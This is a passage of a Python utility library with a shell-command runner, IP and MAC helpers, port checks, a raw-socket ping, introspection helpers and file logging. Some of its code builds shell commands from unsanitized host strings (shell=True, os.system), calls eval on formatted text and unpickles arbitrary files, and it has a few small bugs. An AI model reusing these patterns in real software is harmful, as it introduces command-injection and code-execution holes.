if cmd_a[0] == 'sudo': cmd_file=cmd_a[1]
if path and isinstance(path,str) and os.path.isdir(path) and os.path.isfile(os.path.join(path,cmd_file)):
cmd_env='''export PATH=%s:${PATH}; '''%(path)
if os.path.join(path,cmd_file):
cmd_env=cmd_env+'''cd %s && '''%(path)
elif cmd_file[0] != '/' and cmd_file == os.path.basename(cmd_file) and os.path.isfile(cmd_file):
cmd_env='./'
p = Popen(cmd_env+cmd , shell=True, stdout=PIPE, stderr=PIPE)
out=None
err=None
if progress:
stop_threads=False
ppth=Thread(target=self.Pprog,args=(lambda:stop_threads,progress_pre_new_line,progress_post_new_line,log,progress_interval))
ppth.start()
if isinstance(timeout,(int,str)):
try:
timeout=int(timeout)
except:
timeout=600
if timeout < 3:
timeout=3
if PyVer(3):
try:
out, err = p.communicate(timeout=timeout)
except subprocess.TimeoutExpired:
p.kill()
if progress:
stop_threads=True
ppth.join()
return -1, 'Kill process after timeout ({0} sec)'.format(timeout), 'Error: Kill process after Timeout {0}'.format(timeout),start_time.Init(),start_time.Now(int),cmd,path
else:
if isinstance(timeout,int):
countdown=int('{}'.format(timeout))
while p.poll() is None and countdown > 0:
TIME().Sleep(2)
countdown -= 2
if countdown < 1:
p.kill()
if progress:
stop_threads=True
ppth.join()
return -1, 'Kill process after timeout ({0} sec)'.format(timeout), 'Error: Kill process after Timeout {0}'.format(timeout),start_time.Init(),start_time.Now(int),cmd,path
out, err = p.communicate()
if progress:
stop_threads=True
ppth.join()
if PyVer(3):
out=out.decode("ISO-8859-1")
err=err.decode("ISO-8859-1")
if ansi:
return p.returncode, out.rstrip(), err.rstrip(),start_time.Init(),start_time.Now(int),cmd,path
else:
return p.returncode, ansi_escape.sub('',out).rstrip(), ansi_escape.sub('',err).rstrip(),start_time.Init(),start_time.Now(int),cmd,path
class BYTES:
def __init__(self,src=None,encode='utf-8',default='org'):
'''encode: utf-8(basic),latin1(enhance),windows-1252'''
self.src=src
self.encode=encode
self.default=default
def From(self,src,default='_._'):
self.src=src
if default=='_._': default=self.default
return self.Bytes(encode=self.encode,default=default)
def Bytes(self,encode='utf-8',default='org'):
def _bytes_(src,encode,default='org'):
try:
if PyVer(3):
if isinstance(src,bytes):
return src
else:
return bytes(src,encode)
return bytes(src) # if change to decode then network packet broken
except:
if default == 'org' or default =={'org'}:
return src
return default
tuple_data=False
if isinstance(self.src,tuple):
self.src=list(self.src)
tuple_data=True
if isinstance(self.src,list):
for i in range(0,len(self.src)):
self.src[i]=_bytes_(self.src[i],encode,default)
if tuple_data:
return tuple(self.src)
else:
return self.src
else:
return _bytes_(self.src,encode,default)
def Str(self,encode='latin1',default='org'): # or windows-1252
def _byte2str_(src,encode,default='org'):
if PyVer(3) and isinstance(src,bytes):
return src.decode(encode)
#elif isinstance(src,unicode): # type(self.src).__name__ == 'unicode':
elif Type(src,'unicode'):
return src.encode(encode)
#return '''{}'''.format(src)
if default =='org' or default == {'org'}:
return src
return default
tuple_data=False
if isinstance(self.src,tuple):
self.src=list(self.src)
tuple_data=True
if isinstance(self.src,list):
for i in range(0,len(self.src)):
self.src[i]=_byte2str_(self.src[i],encode,default)
if tuple_data:
return tuple(self.src)
else:
return self.src
else:
return _byte2str_(self.src,encode,default)
def Str2Int(self,encode='utf-8'):
if PyVer(3):
if isinstance(self.src,bytes):
return int(self.src.hex(),16)
else:
return int(self.Bytes(encode=encode).hex(),16)
return int(self.src.encode('hex'),16)
class CONVERT:
def __init__(self,src):
self.src=src
def Int(self,default=False):
if isinstance(self.src,int): return self.src
if Type(self.src,('float','long','str')):
try:return int(self.src)
except: pass
if default == 'org' or default == {'org'}: return self.src
return default
def Str(self,default='org'):
if isinstance(self.src,bytes):
return BYTES(self.src).Str()
else:
try:
return '{}'.format(self.src)
except:
if default == 'org' or default == {'org'}: return self.src
return default
def Ast(self,default=False,want_type=None):
if isinstance(self.src,str):
try:
return ast.literal_eval(self.src)
except:
if default == 'org' or default == {'org'}:
return self.src
return default
if want_type:
if isinstance(self.src,want_type):
return self.src
if default == 'org' or default == {'org'}:
return self.src
return default
def Form(self,default=False):
return self.Ast(default=default)
def Json(self,src=None,default=None):
if src is None: src=self.src
try:
return _json.loads(src)
except:
return default
def Mac2Str(self,case='lower',default=False):
if MAC(self.src).IsV4():
if case == 'lower':
self.src=self.src.strip().replace(':','').replace('-','').lower()
else:
self.src=self.src.strip().replace(':','').replace('-','').upper()
return self.src
return default
def Str2Mac(self,case='lower',default=False,sym=':',chk=False):
if isinstance(self.src, str):
self.src=self.src.strip()
if len(self.src) in [12,17]:
self.src=self.src.replace(':','').replace('-','')
if len(self.src) == 12:
self.src=sym.join(self.src[i:i+2] for i in range(0,12,2))
if case == 'lower':
self.src=self.src.lower()
else:
self.src=self.src.upper()
if chk:
if not MAC(self.src).IsV4():
return default
return self.src
def Size(self,unit='b:g',default=False):
try:
self.src=int(self.src)
except:
return default
unit_a=unit.lower().split(':')
if len(unit_a) != 2:
return False
def inc(sz):
return '%.1f'%(float(sz) / 1024)
def dec(sz):
return int(sz) * 1024
sunit=unit_a[0]
eunit=unit_a[1]
unit_m=['b','k','m','g','t','p']
si=unit_m.index(sunit)
ei=unit_m.index(eunit)
h=ei-si
for i in range(0,abs(h)):
if h > 0:
self.src=inc(self.src)
else:
self.src=dec(self.src)
return self.src
def Url(self):
if isinstance(self.src,str):
return self.src.replace('+','%2B').replace('?','%3F').replace('/','%2F').replace(':','%3A').replace('=','%3D').replace(' ','+')
return self.src
class MAC:
def __init__(self,src=None):
self.src=src
def IsV4(self,**opts):
symbol=opts.get('symbol',':')
default=opts.get('default',False)
if isinstance(self.src,str):
self.src=self.src.strip()
# make sure the format
if 12 <= len(self.src) <= 17:
for i in [':','-']:
self.src=self.src.replace(i,'')
self.src=symbol.join(self.src[i:i+2] for i in range(0,12,2))
# Check the normal mac format
octets = self.src.split(symbol)
if len(octets) != 6: return False
for i in octets:
try:
if len(i) != 2 or int(i, 16) > 255:
return False
except:
return False
return True
return default
def FromStr(self,case='lower',default=False,sym=':',chk=False):
if isinstance(self.src, str):
self.src=self.src.strip()
if len(self.src) in [12,17]:
self.src=self.src.replace(':','').replace('-','')
if len(self.src) == 12:
self.src=sym.join(self.src[i:i+2] for i in range(0,12,2))
if case == 'lower':
self.src=self.src.lower()
else:
self.src=self.src.upper()
if chk:
if not self.IsV4():
return default
return self.src
def ToStr(self,case='lower',default=False):
if self.IsV4():
if case == 'lower':
self.src=self.src.strip().replace(':','').replace('-','').lower()
else:
self.src=self.src.strip().replace(':','').replace('-','').upper()
return self.src
return default
class VERSION:
def __init__(self):
pass
def Clear(self,string,sym='.'):
if isinstance(string,(int,str,float)) and string:
if isinstance(string,str):
string=string.strip()
else:
string='{}'.format(string)
arr=string.split(sym)
for ii in range(len(arr)-1,0,-1):
if arr[ii].replace('0','') == '':
arr.pop(-1)
else:
break
return sym.join(arr)
return False
def Check(self,a,sym,b):
a=self.Clear(a)
b=self.Clear(b)
if a is False or b is False:
return False
if sym == '>':
if LooseVersion(a) > LooseVersion(b):
return True
elif sym == '>=':
if LooseVersion(a) >= LooseVersion(b):
return True
elif sym == '==':
if LooseVersion(a) == LooseVersion(b):
return True
elif sym == '<=':
if LooseVersion(a) <= LooseVersion(b):
return True
elif sym == '<':
if LooseVersion(a) < LooseVersion(b):
return True
return False
def Compare(self,src,compare_symbol,dest,compare_range='dest',version_symbol='.'):
if isinstance(src,dict): src=src.get('version')
if isinstance(dest,dict): dest=dest.get('version')
if isinstance(src,str):
src=STR(src).Split(version_symbol)
elif isinstance(src,tuple):
src=list(src)
if isinstance(dest,str):
dest=STR(dest).Split(version_symbol)
elif isinstance(dest,tuple):
dest=list(dest)
src=[ Int(i) for i in src]
dest=[ Int(i) for i in dest]
if compare_range == 'dest':
src=src[:len(dest)]
elif compare_range == 'src':
dest=dest[:len(src)]
elif isinstance(compare_range,(tuple,list)) and len(compare_range) == 2:
if isinstance(compare_range[0],int) and isinstance(compare_range[1],int):
src=src[compare_range[0]:compare_range[1]]
dest=dest[compare_range[0]:compare_range[1]]
elif not compare_range[0] and isinstance(compare_range[1],int):
src=src[:compare_range[1]]
dest=dest[:compare_range[1]]
elif isinstance(compare_range[0],int) and not compare_range[1]:
src=src[compare_range[0]:]
dest=dest[compare_range[0]:]
elif isinstance(compare_range,int):
if len(src) > compare_range and len(dest) > compare_range:
src=src[compare_range]
dest=dest[compare_range]
else:
return
return eval('{} {} {}'.format(src,compare_symbol,dest))
def is_cancel(func):
ttt=type(func).__name__
if ttt in ['function','instancemethod','method']:
if func():
return True
elif ttt in ['bool','str'] and func in [True,'cancel']:
return True
return False
class IP:
def __init__(self,ip=None):
self.ip=ip
def IsV4(self,ip=None):
if not ip: ip=self.ip
if self.V4(ip,default=False) is False: return False
return True
def IsBmcIp(self,ip=None,port=(623,664,443)):
return self.IsOpenPort(port,ip=ip)
def IsOpenPort(self,port,**opts):
'''
It connectionable port(?) like as ssh, ftp, telnet, web, ...
'''
default=opts.get('default',False)
ip=opts.get('ip')
if not ip:
ip=self.ip
tcp_sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
tcp_sk.settimeout(1)
if self.IsV4(ip) is False or not isinstance(port,(str,int,list,tuple)):
return default
if isinstance(port,(str,int)):
try:
port=[int(port)]
except:
return default
for pt in port:
try:
tcp_sk.connect((ip,pt))
tcp_sk.close()
return True
except:
pass
return False
def IsUsedPort(self,port,ip=None):
if ip is None:
ip=self.ip
if ip in ['localhost','local',None]:
ip='127.0.0.1'
'''
The IP used the port, it just checkup used port. (open port or dedicated port)
'''
soc=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
location=(ip,int(port))
rc=soc.connect_ex(location)
soc.close()
if rc== 0:
return True
return False
def Ip2Num(self,ip=None,default=False):
if not ip: ip=self.ip
return self.V4(ip,out=int,default=default)
def Ip2Str(self,ip=None,default=False):
if not ip:ip=self.ip
return self.V4(ip,out=str,default=default)
def Ip2hex(self,ip=None,default=False):
if not ip: ip=self.ip
return self.V4(ip,out=hex,default=default)
def InRange(self,start_ip,end_ip,**opts):
ip=opts.get('ip')
if not ip: ip=self.ip
default=opts.get('default',False)
startip=self.Ip2Num(start_ip)
myip=self.Ip2Num(ip)
endip=self.Ip2Num(end_ip)
if isinstance(startip,int) and isinstance(myip,int) and isinstance(endip,int):
if startip <= myip <= endip: return True
return False
return default
def LostNetwork(self,**opts):
ip=opts.get('ip')
if not ip: ip=self.ip
default=opts.get('default',False)
timeout_sec=opts.get('timeout',1800)
interval=opts.get('interval',2)
keep_good=opts.get('keep_good',30)
cancel_func=opts.get('cancel_func',None)
log=opts.get('log',None)
init_time=None
if self.IsV4(ip):
if not self.Ping(ip,count=5):
if not self.Ping(ip,count=0,timeout=timeout_sec,keep_good=keep_good,interval=interval,cancel_func=cancel_func,log=log):
return True
return False
return default
def V4(self,ip=None,out='str',default=False):
if ip is None: ip=self.ip
ip_int=None
if isinstance(ip,str):
ipstr=ip.strip()
if '0x' in ipstr:
ip_int=int(ipstr,16)
elif ipstr.isdigit():
ip_int=int(ipstr)
elif '.' in ipstr:
try:
ip_int=struct.unpack("!I", socket.inet_aton(ipstr))[0] # convert Int IP
#struct.unpack("!L", socket.inet_aton(ip))[0]
except:
return default
elif isinstance(ip,int):
try:
socket.inet_ntoa(struct.pack("!I", ip)) # check int is IP or not
ip_int=ip
except:
return default
elif isinstance(ip,type(hex)):
ip_int=int(ip,16)
if ip_int is not None:
try:
if out in ['str',str]:
return socket.inet_ntoa(struct.pack("!I", ip_int))
elif out in ['int',int]:
return ip_int
elif out in ['hex',hex]:
return hex(ip_int)
except:
pass
return default
def Online(self,**opts):
ip=opts.get('ip')
if not ip: ip=self.ip
default=opts.get('default',False)
timeout_sec=opts.get('timeout',1800)
interval=opts.get('interval',3)
keep=opts.get('keep',20)
cancel_func=opts.get('cancel_func',None)
log=opts.get('log',None)
time=TIME()
run_time=time.Int()
if self.IsV4(ip):
if log:
log('[',direct=True,log_level=1)
while True:
if time.Out(timeout_sec):
if log:
log(']\n',direct=True,log_level=1)
return False,'Timeout monitor'
if is_cancel(cancel_func):
if log:
log(']\n',direct=True,log_level=1)
return True,'Stopped monitor by Custom'
if self.Ping(ip,cancel_func=cancel_func):
if (time.Int() - run_time) > keep:
if log:
log(']\n',direct=True,log_level=1)
return True,'OK'
if log:
log('-',direct=True,log_level=1)
else:
run_time=time.Int()
if log:
log('.',direct=True,log_level=1)
time.Sleep(interval)
if log:
log(']\n',direct=True,log_level=1)
return False,'Timeout/Unknown issue'
return default,'IP format error'
def Ping(self,host=None,count=0,interval=1,keep_good=0, timeout=0,lost_mon=False,log=None,stop_func=None,log_format='.',cancel_func=None):
if host is None: host=self.ip
ICMP_ECHO_REQUEST = 8 # Seems to be the same on Solaris. From /usr/include/linux/icmp.h;
ICMP_CODE = socket.getprotobyname('icmp')
ERROR_DESCR = {
1: ' - Note that ICMP messages can only be '
'sent from processes running as root.',
10013: ' - Note that ICMP messages can only be sent by'
' users or processes with administrator rights.'
}
def checksum(msg):
sum = 0
size = (len(msg) // 2) * 2
for c in range(0,size, 2):
sum = (sum + ord(msg[c + 1])*256+ord(msg[c])) & 0xffffffff
if size < len(msg):
sum = (sum+ord(msg[len(msg) - 1])) & 0xffffffff
ra = ~((sum >> 16) + (sum & 0xffff) + (sum >> 16)) & 0xffff
ra = ra >> 8 | (ra << 8 & 0xff00)
return ra
def mk_packet(size):
"""Make a new echo request packet according to size"""
# Header is type (8), code (8), checksum (16), id (16), sequence (16)
header = struct.pack('bbHHh', ICMP_ECHO_REQUEST, 0, 0, size, 1)
#data = struct.calcsize('bbHHh') * 'Q'
data = size * 'Q'
my_checksum = checksum(CONVERT(header).Str() + data)
header = struct.pack('bbHHh', ICMP_ECHO_REQUEST, 0,
socket.htons(my_checksum), size, 1)
return header + BYTES().From(data)
def receive(my_socket, ssize, stime, timeout):
while True:
if timeout <= 0:
return
ready = select.select([my_socket], [], [], timeout)
if ready[0] == []: # Timeout
return
received_time = time.time()
packet, addr = my_socket.recvfrom(1024)
type, code, checksum, gsize, seq = struct.unpack('bbHHh', packet[20:28]) # Get Header
if gsize == ssize:
return received_time - stime
timeout -= received_time - stime
def pinging(ip,timeout=1,size=64):
try:
my_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, ICMP_CODE)
except socket.error as e:
if e.errno in ERROR_DESCR:
raise socket.error(''.join((e.args[1], ERROR_DESCR[e.errno])))
raise
if size in ['rnd','random']:
# Maximum size for an unsigned short int c object(65535)
size = int((id(timeout) * random.random()) % 65535)
packet = mk_packet(size)
while packet:
sent = my_socket.sendto(packet, (ip, 1)) # ICMP have no port, So just put dummy port 1
packet = packet[sent:]
delay = receive(my_socket, size, TIME().Time(), timeout)
my_socket.close()
if delay:
return delay,size
def do_ping(ip,timeout=1,size=64,count=None,interval=0.7,log_format='ping',cancel_func=None):
ok=1
i=1
while True:
if is_cancel(cancel_func):
return -1,'canceled'
delay=pinging(ip,timeout,size)
if delay:
ok=0
if log_format == '.':
sys.stdout.write('.')
sys.stdout.flush()
elif log_format == 'ping':
sys.stdout.write('{} bytes from {}: icmp_seq={} ttl={} time={} ms\n'.format(delay[1],ip,i,size,round(delay[0]*1000.0,4)))
sys.stdout.flush()
else:
ok=1
if log_format == '.':
sys.stdout.write('x')
sys.stdout.flush()
elif log_format == 'ping':
sys.stdout.write('{} icmp_seq={} timeout ({} second)\n'.format(ip,i,timeout))
sys.stdout.flush()
if count:
count-=1
if count < 1:
return ok,'{} is alive'.format(ip)
i+=1
TIME().Sleep(interval)
if log_format=='ping':
if not count: count=1
if find_executable('ping'):
os.system("ping -c {0} {1}".format(count,host))
else:
do_ping(host,timeout=timeout,size=64,count=count,log_format='ping',cancel_func=cancel_func)
else:
Time=TIME()
init_sec=0
infinit=False
if not count and not timeout:
count=1
infinit=True
if not infinit and not count:
init_sec=Time.Init()
if keep_good and keep_good > timeout:
timeout=keep_good + timeout
count=timeout
chk_sec=Time.Init()
log_type=type(log).__name__
found_lost=False
good=False
while count > 0:
if is_cancel(cancel_func):
log(' - Canceled ping')
return False
if stop_func:
if log_type == 'function':
log(' - Stopped ping')
return False
if find_executable('ping'):
rc=SHELL().Run("ping -c 1 {}".format(host))
else:
rc=do_ping(host,timeout=1,size=64,count=1,log_format=None)
if rc[0] == 0:
good=True
if keep_good:
if good and keep_good and TIME().Now(int) - chk_sec >= keep_good:
return True
else:
return True
if log_type == 'function':
log('.',direct=True,log_level=1)
else:
sys.stdout.write('.')
sys.stdout.flush()
else:
good=False
chk_sec=TIME().Now(int)
if log_type == 'function':
log('x',direct=True,log_level=1)
else:
sys.stdout.write('.')
sys.stdout.flush()
if init_sec:
count=count-(TIME().Now(int)-init_sec)
elif not infinit:
count-=1
TIME().Sleep(interval)
return good
class GET:
def __init__(self,src=None,**opts):
self.src=src
def __repr__(self):
if self.src is None: return repr(self.MyAddr())
if Type(self.src,('instance','classobj')):
def method_in_class(class_name):
ret=dir(class_name)
if hasattr(class_name,'__bases__'):
for base in class_name.__bases__:
ret=ret+method_in_class(base)
return repr(ret)
return repr(method_in_class(self.src))
elif Type(self.src,'dict'):
return repr(list(self.src.keys()))
elif Type(self.src,('str','list','tuple')):
return repr(len(self.src))
else:
#return repr(type(self.src).__name__)
return repr(self.src)
def MyAddr(self):
return hex(id(self))
def Index(self,*find,**opts):
default=opts.get('default',None)
err=opts.get('err',False)
out=opts.get('out',None)
rt=[]
if Type(self.src,(list,tuple,str)):
for ff in find:
if ff in self.src: rt.append(self.src.index(ff))
elif Type(self.src,dict):
for i in self.src:
for ff in find:
if find == self.src[i]: rt.append(i)
if rt: return OutFormat(rt,out=out)
if err == {'org'}: return self.src
return OutFormat(default,out=out)
def Value(self,*find,**opts):
default=opts.get('default',None)
err=opts.get('err',False)
out=opts.get('out',None)
check=opts.get('check',('str','list','tuple','dict','instance','classobj'))
rt=[]
src_name=type(self.src).__name__
if len(find) == 0:
if src_name in ['kDict','kList','DICT']: return self.src.Get()
if Type(self.src,('instance','classobj')):
def method_in_class(class_name):
ret=dir(class_name)
if hasattr(class_name,'__bases__'):
for base in class_name.__bases__:
ret=ret+method_in_class(base)
return ret
return method_in_class(self.src)
elif Type(self.src,tuple(check)):
# Support
if Type(self.src,(list,tuple,str)):
if src_name in ['kList']: self.src=self.src.Get()
for ff in Abs(*find,obj=self.src,out=list,default=None,err=err):
if ff is None:
if err in [True,'True','err']: rt.append(default)
else:
rt.append(self.src[ff])
elif Type(self.src,dict):
if src_name in ['kDict','DICT']: self.src=self.src.Get()
for ff in find:
gval=self.src.get(ff,default)
if gval == default:
if err in [True,'True','err']: rt.append(gval)
else:
rt.append(gval)
elif Type(self.src,('instance','classobj')):
# get function object of finding string name in the class/instance
for ff in find:
if isinstance(ff,(list,tuple,dict)):
for kk in ff:
rt.append(getattr(self.src,kk,default))
elif isinstance(ff,str):
rt.append(getattr(self.src,ff,default))
if rt: return OutFormat(rt,out=out)
# Not support format or if not class/instance then return error
if err in [True,'True','true','err','ERR','ERROR','error']: OutFormat(default,out=out)
return OutFormat(self.src,out=out)
def Read(self,default=False):
if Is(self.src).Pickle():
try:
with open(self.src,'rb') as handle:
return pickle.load(handle)
except:
pass
elif os.path.isfile(self.src):
return FILE().Get(self.src)
return default
def Args(self,field='all',default={}):
rt={}
if Type(self.src,('classobj,instance')):
try:
self.src=getattr(self.src,'__init__')
except:
return self.src.__dict__
elif not Type(self.src,'function'):
return default
args, varargs, keywords, defaults = inspect.getargspec(self.src)
if defaults is not None:
defaults=dict(zip(args[-len(defaults):], defaults))
del args[-len(defaults):]
rt['defaults']=defaults
if args:
rt['args']=args
if varargs:
rt['varargs']=varargs
if keywords:
rt['keywards']=keywords
if Type(field,(list,tuple)):
rts=[]
for ii in field:
rts.append(rt.get(ii,default))
return rts
else:
if field in ['*','all']:
return rt
if field in rt:
return rt[field]
return default
def ArgType(self,arg,want='_',get_data=['_']):
type_arg=type(arg)
if want in get_data:
if type_arg.__name__ == 'Request':
return arg.method.lower()
return type_arg.__name__.lower()
if Type(want,str):
if type_arg.__name__ == 'Request':
if want.upper() == 'REQUEST' or want.upper() == arg.method:
return True
return False
else:
if type_arg.__name__.lower() == want.lower():
return True
else:
if type_arg == want:
return True
return False
def FuncList(self):
rt={}
if Type(self.src,'instance'):
self.src=self.src.__class__
if Type(self.src,('classobj','module')):
for name,fobj in inspect.getmembers(self.src):
if Type(fobj,('function','instancemethod')):
rt.update({name:fobj})
return rt
def FunctionList(self):
return self.FuncList()
def Func(self,name,default=None):
funcList=self.FuncList()
if isinstance(name,str):
if name in funcList: return funcList[name]
elif Type(name,('function','instancemeethod')):
return name
return default
def Function(self,name,default=None):
return self.Func(name,default=default)
def FuncName(self,default=False,detail=False):
#return traceback.extract_stack(None, 2)[0][2]
try:
dep=len(inspect.stack())-2
if detail:
return sys._getframe(dep).f_code.co_name,sys._getframe(dep).f_lineno,sys._getframe(dep).f_code.co_filename
else:
name=sys._getframe(dep).f_code.co_name
if name == '_bootstrap_inner' or name == '_run_code':
return sys._getframe(3).f_code.co_name
return name
except:
return default
def FunctionName(self,default=False,detail=False):
return self.FuncName(default=default,detail=detail)
def ParentName(self):
return traceback.extract_stack(None, 3)[0][2]
def Class(self,default=None):
if Type(self.src,'instance'):
return self.src.__class__
elif Type(self.src,'classobj'):
return self.src
else:
return default
def ClassName(self,default=None):
if Type(self.src,'instance'):
return self.src.__class__.__name__
elif Type(self.src,'classobj'):
return self.src.__name__
else:
return default
def DirName(self,default=None):
if Type(self.src,str):
dirname=os.path.dirname(self.src)
if dirname == '': return '.'
return dirname
return default
def DirectoryName(self,default=None):
return self.DirName(default=default)
def Pwd(self):
#return os.path.abspath(__file__)
return os.path.dirname(os.path.realpath(__file__))
def Basename(self):
if Type(self.src,str): return os.path.basename(self.src)
return __file__
class IS:
def __init__(self,src=None,**opts):
self.src=src
self.rtd=opts.get('rtd',{'GOOD':[True,'True','Good','Ok','Pass',{'OK'},0],'FAIL':[False,'False','Fail',{'FAL'}],'NONE':[None,'None','N/A',{'NA'}],'IGNO':['IGNO','Ignore',{'IGN'}],'ERRO':['ERR','Error',{'ERR'}],'WARN':['Warn',{'WAR'}],'UNKN':['Unknown','UNKN',{'UNK'}],'JUMP':['Jump',{'JUMP'}]})
def Py2(self):
if PyVer(2): return True
return False
def Py3(self):
if PyVer(3): return True
return False
def Int(self):
try:
int(self.src)
return True
except:
return False
def Ipv4(self):
return IP(self.src).IsV4()
def Mac4(self,**opts):
return MAC(self.src).IsV4()
def Ip_with_port(self,port,**opts):
return IP(self.src).WithPort(port,**opts)
def File(self):
if isinstance(self.src,str): return os.path.isfile(self.src)
return False
def Dir(self):
if isinstance(self.src,str): return os.path.isdir(self.src)
return False
def Xml(self):
firstLine=file_rw(self.src,out='string',read='firstline')
if firstLine is False:
#filename_str=_u_byte2str(self.src)
filename_str=CONVERT(self.src).Str()
if isinstance(filename_str,str):
firstLine=filename_str.split('\n')[0]
if isinstance(firstLine,str) and firstLine.split(' ')[0] == '<?xml': return True
return False
def Json(self,src=None):
if src is None: src=self.src
try:
_json.loads(self.src)
return True
except:
return False
def Pickle(self):
if isinstance(self.src,str) and os.path.isfile(self.src):
try:
with open(self.src,'rb') as f: # Pickle Type
pickle.load(f)
return True
except:
pass
return False
def Matrix(self,**opts):
default=opts.get('default',False)
if isinstance(self.src,(tuple,list)) and len(self.src) >= 1:
if isinstance(self.src[0],(tuple,list)): # |a,b,c|
first_ln=len(self.src[0]) # |d,e,f|
for ii in self.src[1:]:
if isinstance(ii,(tuple,list)) and len(ii) == first_ln: continue
return False
return True
else: # |a,b,c,d|
first_typ=type(self.src[0])
for ii in self.src[1:]:
if type(ii) != first_type: return False
return True
return default
def Lost_network(self,**opts):
return IP(self.src).LostNetwork(**opts)
def Comback_network(self,**opts):
return IP(self.src).Online(**opts)
def Rc(self,chk='_'):
def trans(irt):
type_irt=type(irt)
for ii in rtd:
for jj in rtd[ii]:
if type(jj) == type_irt and ((type_irt is str and jj.lower() == irt.lower()) or jj == irt):
return ii
return 'UNKN'
rtc=Get(self.src,'0|rc',out='raw',err='ignore',check=(list,tuple,dict))
nrtc=trans(rtc)
if chk != '_':
if trans(chk) == nrtc:
return True
return False
return nrtc
def Cancel(self,func=None):
if func is None:
func=self.src
ttt=type(func).__name__
if ttt in ['function','instancemethod','method']:
if func():
return True
elif ttt in ['bool','str'] and func in [True,'cancel']:
return True
return False
def Window(self):
return False
def Android(self):
return False
def IOS(self):
return False
def Centos(self):
return False
def Unbuntu(self):
return False
def Suse(self):
return False
def Linux(self):
if self.centos() or self.ubuntu() or self.suse(): return True
return False
def Function(self,obj=None,default=False):
if Type(self.src,'function'): return True
if obj is None:
obj=sys.modules.get('__name__',default)
elif isinstance(obj,str):
obj=sys.modules.get(obj,default)
if obj == default: return default
if Type(obj,'Class','module'):
if GET(obj).FuncList().get(self.src,default) == default: return default
return True
#return vars(obj).get(self.src,default)
return default
def Var(self,obj=None,default=False):
if obj is None:
obj=sys.modules.get('__main__',default)
elif isinstance(obj,str):
obj=sys.modules.get(obj,default)
if obj == default: return default
if Type(obj,'class','function','instance'):
ARGS=GET(obj).Args()
for tt in ARGS:
if self.src in ARGS[tt]: return True
else:
get_var=dict(inspect.getmembers(inspect.stack()[1][0]))["f_globals"].get(self.src,'_#_')
if get_var != '_#_':
if not Type(get_var,'module','class','function'): return True
# if hasattr(obj,self.src):
# return True
return False
def Exec(self):
if isinstance(self.src,str):
if find_executable(self.src):
return True
return False
def Bin(self):
return self.Exec()
def Same(self,src=None,chk_val=None,sense=False):
def _IsSame_(src,chk,sense):
src_type=type(src).__name__
chk_type=type(chk).__name__
if src_type == 'bytes' or chk_type == 'bytes':
if chk_type=='int': chk='{}'.format(chk)
if isinstance(chk,str):
chk=BYTES().From(chk)
if not sense:
chk=chk.lower()
if src_type=='int': src='{}'.format(src)
if isinstance(src,str):
src=BYTES().From(src)
if not sense:
src=src.lower()
if src == chk: return True
else:
if src_type == 'str' and src.isdigit(): src=int(src)
if chk_type == 'str' and chk.isdigit(): chk=int(chk)
if not sense and isinstance(src,str) and isinstance(chk,str):
if src.lower() == chk.lower(): return True
elif src == chk:
return True
return False
if isinstance(src,(list,tuple)) and isinstance(chk_val,(list,tuple)):
for j in src:
ok=False
for i in chk_val:
aa=_IsSame_(j,i,sense)
if aa is True:
ok=True
break
if ok is False: return False
for j in chk_val:
ok=False
for i in src:
aa=_IsSame_(j,i,sense)
if aa is True:
ok=True
break
if ok is False: return False
return True
else:
if isinstance(chk_val,(list,tuple)):
for i in chk_val:
aa=_IsSame_(src,i,sense)
if aa is True: return True
return False
else:
return _IsSame_(src,chk_val,sense)
class LOG:
def __init__(self,**opts):
self.limit=opts.get('limit',3)
self.dbg_level=opts.get('dbg_level',None)
self.path=opts.get('path','/tmp')
self.log_file=opts.get('log_file',None)
self.info_file=opts.get('info_file',None)
self.error_file=opts.get('error_file',None)
self.dbg_file=opts.get('dbg_file',None)
self.screen=opts.get('screen',False)
self.date_format=opts.get('date_format','[%m/%d/%Y %H:%M:%S]')
def Format(self,*msg,**opts):
log_date_format=opts.get('date_format',self.date_format)
func_name=opts.get('func_name',None)
end_new_line=opts.get('end_new_line','')
start_new_line=opts.get('start_new_line','\n')
if len(msg) > 0:
m_str=None
intro=''
intro_space=''
if log_date_format:
intro=TIME().Format(tformat=log_date_format)+' '
func_name_name=type(func_name).__name__
if func_name_name == 'str':
intro=intro+'{0} '.format(func_name)
elif func_name is True:
intro=intro+'{0}() '.format(get_caller_fcuntion_name())
elif func_name_name in ['function','instancemethod']:
intro=intro+'{0}() '.format(func_name.__name__)
if intro:
for i in range(0,len(intro)):
intro_space=intro_space+' '
for m in list(msg):
n=m.split('\n')
if m_str is None:
m_str='{0}{1}{2}{3}'.format(start_new_line,intro,n[0],end_new_line)
else:
m_str='{0}{1}{2}{3}{4}'.format(m_str,start_new_line,intro_space,n[0],end_new_line)
for nn in n[1:]:
m_str='{0}{1}{2}{3}{4}'.format(m_str,start_new_line,intro_space,nn,end_new_line)
return m_str
def Syslogd(self,*msg,**opts):
syslogd=opts.get('syslogd',None)
if syslogd:
syslog_msg=' '.join(msg)
if syslogd in ['INFO','info']:
syslog.syslog(syslog.LOG_INFO,syslog_msg)
elif syslogd in ['KERN','kern']:
syslog.syslog(syslog.LOG_KERN,syslog_msg)
elif syslogd in ['ERR','err']:
syslog.syslog(syslog.LOG_ERR,syslog_msg)
elif syslogd in ['CRIT','crit']:
syslog.syslog(syslog.LOG_CRIT,syslog_msg)
elif syslogd in ['WARN','warn']:
syslog.syslog(syslog.LOG_WARNING,syslog_msg)
elif syslogd in ['DBG','DEBUG','dbg','debug']:
syslog.syslog(syslog.LOG_DEBUG,syslog_msg)
else:
syslog.syslog(syslog_msg)
def File(self,log_str,log_level,special_file=None):
log_file=None
if os.path.isdir(self.path):
if (log_level in ['dbg','debug'] or (isinstance(log_level,int) and isinstance(self.dbg_level,int) and self.dbg_level <= log_level <= self.limit)) and isinstance(self.dbg_file,str):
log_file=os.path.join(self.path,self.dbg_file)
elif log_level in ['info'] and isinstance(self.info_file,str):
log_file=os.path.join(self.path,self.info_file)
elif log_level in ['error'] and isinstance(self.error_file,str):
log_file=os.path.join(self.path,self.error_file)
elif isinstance(self.log_file,str) or isinstance(special_file,str):
if special_file:
log_file=os.path.join(self.path,special_file)
elif log_level in ['dbg','debug','info','error'] or (isinstance(log_level,int) and log_level <= self.limit):
log_file=os.path.join(self.path,self.log_file)
if log_file:
with open(log_file,'a+') as f:
f.write(log_str)
return log_file
